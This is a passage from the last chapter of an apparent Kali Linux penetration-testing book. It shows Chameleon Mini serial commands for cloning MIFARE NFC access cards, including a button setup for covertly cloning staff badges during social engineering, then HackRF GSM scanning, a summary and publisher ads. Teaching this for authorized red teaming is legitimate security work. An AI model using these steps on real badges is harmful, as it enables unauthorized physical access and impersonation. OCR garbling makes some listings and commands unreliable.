| Bus 081 | Device | 084: 1 | ID 1 | 8412:6449 | Chicony | ELe | ctronics | Co., Lto | 1 | | | | |
| Bus 081 | Device | 003: | 10.1 | 8087:8a2a | Intel C | erp. | | | | | | | |
| Bus 001 | Device | 00Z: 1 | ID . | 135a:0017 | Validit | ty Se | nsors. I | inc. Finge | erprint R | eader | | | |
| Bus 001 | Device | 981: 3 | 10 | 1d65:8602 | Linux F | ound | ation 2. | 8 root hu | ip. | | | | |
| numerile b | i-≓ ls | usb | | | | | | | | | | | |
| Bus 003 | Device | 0021 | ID-1 | 8687:8601 | Intel C | larp. | | | | | | | |
| Bus 083 1 | Device | 001: 1 | 10 1 | 1d65:8662 | Linux P | ound | ation 2: | e root he | iti - | | | | |
| Bus 002 1 | Device | 001: | 10 .: | 1d65:0003 | Linux F | ound | ation 3: | 0 root ho | 10: | | | | |
| Bus 001 1 | Device | 0841 | ID I | 84f2:b449 | Chicony | Ele | ctronics | CD., Ltd | t | | | | |
| Bus 001 1 | Device | 003: 1 | 10.1 | 8687:8a2a | Intel C | orp. | | | | | | | |
| Bus 001 | Device | 002: | 10 : | 138a:0017 | Validit | ty Se | nsors, I | nc. Finge | erprint R | sader | | | |
| Bus 001 1 | Device | 006: 3 | 10 | 16d9:9452 | MCS. | | | | | | | | |
| Bus 081 1 | Device: | 001: | 10 | 1665:8662 | Linux P | ound | ation 2. | 0 root hu | ib | | | | |
| COMMENT | i≓# ls | /dev | /t: - | | | | | | | | | | |
| tpe0 | tty12 | tt | y18 | tty23 | tty2 | 19 | tty34 | tty4 | tty45 | tty58 | tty56 | tty61 | ttyACM8 |
| tty | tty13 | tt | 19 | tty24 | tty3 | 1 | tty35 | tty40 | tty46 | tty51 | tty57 | tty62 | tty58 |
| tty0 | tty14 | tt | y2 | tty25 | tty3 | 10 | tty36 | tty41 | tty47 | tty52 | tty58 | tty63 | tty51 |
| ttyl | tty15 | tt | y28 | tty26 | tty3 | 11 | tty37 | tty42 | tty48 | tty53 | tty59 | tty7 | tty52 |
| ttyle . | tty16 | 11 | y21 | 11927 | tty3 | 12 | 11938 | tTy43 | tty49 | tty54 | tty6 | TTy8 | tty53 |
| tty11 | tty17 | tt | y22 | tty28 | tty3 | 13 | tty39 | tty44 | tty5 | tty55 | tty68 | tty9 | |

We can communicate to the serial port directly using socat by running socat -/dev/ttyACM0, crnl as shown in the following screenshot:



You will require the card that you want to clone. One-step action can also be performed straight by placing the card to be cloned on the Chameleon Mini. Tester's straight can type **CLONE** and the job is done as shown in the following screenshot:

```
root@kali:~# socat - /dev/ttyACM0,crn1
HELP
101:oK WITH TEXT
VERSION,CONFIG,UID,READONLY,UPLOAD,DOWNLOAD,
EN,LEDRED,LOGMODE,LOGMEM,LOGDOWNLOAD,LOGSTOR
,GETUID,DUMP_MFU,IDENTIFY,TIMEOUT,THRESHOLD,
CLONE
101:OK WITH TEXT
Cloned OK!
UID?
101:OK WITH TEXT
16
CONFIG?
101:OK WITH TEXT
MF_CLASSIC_1K
```

The following details provide the manual way of doing it:

- 1. Command line
 - 1. Once the serial port communication is established between Kali and the device, type the HELP command to display all the available commands for Chameleon Mini.
 - Chameleon Mini comes with eight slots, each of which can act as an individual NFC card. The slots can be set by using the SETTINGS= command. For example, we can set the slot to 2 by typing the settings=2 command; it should return as 100:0K.
 - 3. Run CONFIG? to see the current configuration. The new device should return the following:

```
101:OK WITH TEXT
None
```

- 2. The next step is to enable the card reader into **'reader'** mode. This can be achieved by typing CONFIG=ISO14443A_READER.
- 3. Now we can place the card that needs to be cloned on the card reader and type the Identify command.
- 4. Once you identify the type of the card, you can now set the configuration

using the config command: in our case, it is MIFARE Classic 1K, so we will run config= mf_classic_1k.

5. Now we have set the configuration, we can steal the UID from the card and then add to our Chameleon Mini by running UID=CARD NUMBER, as shown in the following screenshot:

| <pre>root@kali:~# socat - /dev/ttyACM0,crnl</pre> |
|--|
| HELP |
| 101:OK WITH TEXT |
| VERSION, CONFIG, UID, READONLY, UPLOAD, DOWNLOAD, RESET, UPGRA |
| EN, LEDRED, LOGMODE, LOGMEM, LOGDOWNLOAD, LOGSTORE, LOGCLEAR, |
| , GETUID, DUMP MFU, IDENTIFY, TIMEOUT, THRESHOLD, AUTOCALIBRA |
| SETTING=1 |
| 100:OK |
| CONFIG? |
| 101:OK WITH TEXT |
| NONE |
| CONFIG=? |
| 101:OK WITH TEXT |
| NONE, MF ULTRALIGHT, MF ULTRALIGHT EV1 80B, MF ULTRALIGHT |
| 7B, ISO14443A SNIFF, ISO14443A READER |
| CONFIG=ISO14443A READER |
| 100:OK |
| IDENTIFY |
| 101:OK WITH TEXT |
| MIFARE Classic 1k |
| ATQA: 0400 |
| UID: 1 316 |
| SAK: 08 |
| CONFIG=MF CLASSIC 1K |
| 100:OK |
| UID=6 |
| 100:OK |
| |
| |

- 6. We are now all set to use the Chameleon Mini as a card.
- 7. Pentesters can also pre-program this to perform the cloning tasks with the

use of two buttons that come along with the device whilst on the move. For example, during social engineering, while the testers talk to the victimcompany's staff, they click the button and clone their ID cards (NFC). This can be performed by the following commands:

- LBUTTON=CLONE: This will set a click on the left-hand button to clone the card.
- RBUTTON=CYCLE_SETTINGS: This will set a click of the right button to rotate the slots. For example, if CARD A is cloned to slot 1 and you wanted to clone another card, this can be performed by clicking the right-hand button that will move the slots, for instance, to slot 2. Then, you can go ahead and press the left-hand button to clone another CARD B.

Other tools

There are other tools such as HackRF One, which is a software-defined radio that can also be utilized by penetration testers to perform any kind of radio sniffing or transmission of your own signals, or even replay the captured radio packets.

We will take a brief example of sniffing a radio frequency in Kali Linux using HackRF One SDR. HackRF libraries are pre-installed. Testers should be able to identify the device by running hackrf_info from the terminal. If the device is recognized, you should be able to see the following screenshot with the details of firmware, part ID, and so on:

| root@kali:~# hackrf info |
|--|
| hackrf info version: unknown |
| libhackrf version: unknown (0.5) |
| Found HackRF |
| Index: 0 |
| Board ID Number: 2 (HackRF One) |
| Firmware Version: git-44df9d1 (API:1.00) |
| Part ID Number: 0xa000cb3c 0x005d4f48 |

Pentesters can utilize the kalibrate tool for scanning any GSM base stations. This tool can be downloaded from https://github.com/scateu/kalibrate-hackrf and be built using the following commands:

```
git clone https://github.com/scateu/kalibrate-hackrf
cd kalibrate-hackrf
./bootstrap
./configure
./make && make install
```

Once the installation is complete, kal will be the tool to utilize to scan any specific band or by mentioning the frequency as shown in the following screenshot:

| root@kali:~/ka | libra | ate-hackrf# | k | tal -s GSM900 | | |
|----------------|-------|--------------|----|---------------|--------|------------|
| kal: Scanning | for 6 | SSM-900 base | 1 | stations. | | |
| GSM-900: | | | | | | |
| chan: | 47 | (944.4MHz - | ÷ | 38.205kHz) | power: | 698071.68 |
| chan: | 48 | (944.6MHz - | ÷ | 13.760kHz) | power: | 620465.95 |
| chan: | 49 | (944.8MHz - | - | 10.448kHz) | power: | 617233.78 |
| chan: | 50 | (945.0MHz - | - | 38.829kHz) | power: | 629163.32 |
| chan: | 56 | (946.2MHz - | - | 11.024kHz) | power: | 411237.29 |
| chan: | 69 | (948.8MHz - | ÷ | 6.962kHz) | power: | 1079474.47 |
| chan: | 72 | (949.4MHz - | ť | 7.306kHz) | power: | 784737.50 |
| chan: | 91 | (953.2MHz - | ł | 26.349kHz) | power: | 555656.59 |
| chan: | 92 | (953.4MHz - | ÷ | 24.712kHz) | power: | 627278.41 |
| chan: | 93 | (953.6MHz - | ł. | 14.840kHz) | power: | 591864.86 |
| chan: | 94 | (953.8MHz - | - | 10.265kHz) | power: | 579114.89 |
| chan: | 106 | (956.2MHz - | - | 17.932kHz) | power: | 530616.12 |

If the testers could identify the type of peripherals during an on-site assessment and found the company is utilizing certain vulnerable hardware, then one can also utilize Crazyradio PA, a long range 2.4 GHz USB radio dongle that can deliver a payload to any computer that is using the vulnerable device through radio wireless signals.

Summary

In this chapter, we took a quick journey into basic embedded systems and their architecture, and we learned about different types of firmwares, bootloaders, UART, radio sniffing, and common tools that can be utilized during a hardware hacking. We also learned how to unpack a firmware and load a new firmware on a router using USBJtag NT, and we explored using RouterSploit to identify the specific vulnerabilities in the embedded devices. Finally, we learned how to clone a physical RFID/NFC card using a Chameleon Mini, which can be utilized during red teaming exercises.

We hope this book has helped you to understand the fundamental risks and how attackers use these tools to compromise networks/devices within a few seconds, and how you can use the same tools and techniques to understand your infrastructure vulnerabilities, as well as the importance of remediation and patch management before your own infrastructure is compromised. On that note, this chapter concludes *Mastering Kali Linux for Advanced Penetration Testing – Third Edition*.

Other Books You May Enjoy

If you enjoyed this book, you may be interested in these other books by Packt:



Advanced Infrastructure Penetration Testing

Chiheb Chebbi

ISBN: 9781788624480

- Exposure to advanced infrastructure penetration testing techniques and methodologies
- Gain hands-on experience of penetration testing in Linux system vulnerabilities and memory exploitation
- Understand what it takes to break into enterprise networks
- Learn to secure the configuration management environment and continuous delivery pipeline
- Gain an understanding of how to exploit networks and IoT devices
- Discover real-world, post-exploitation techniques and countermeasures



Kali Linux Web Penetration Testing Cookbook - Second Edition Gilberto Najera-Gutierrez

ISBN: 9781788991513

- Set up a secure penetration testing laboratory
- Use proxies, crawlers, and spiders to investigate an entire website
- Identify cross-site scripting and client-side vulnerabilities
- Exploit vulnerabilities that allow the insertion of code into web applications
- Exploit vulnerabilities that require complex setups
- Improve testing efficiency using automated vulnerability scanners
- Learn how to circumvent security controls put in place to prevent attacks

Leave a review - let other readers know what you think

Please share your thoughts on this book with others by leaving a review on the site that you bought it from. If you purchased the book from Amazon, please leave us an honest review on this book's Amazon page. This is vital so that other potential readers can see and use your unbiased opinion to make purchasing decisions, we can understand what our customers think about our products, and our authors can see your feedback on the title that they have worked with Packt to create. It will only take a few minutes of your time, but is valuable to other potential customers, our authors, and Packt. Thank you!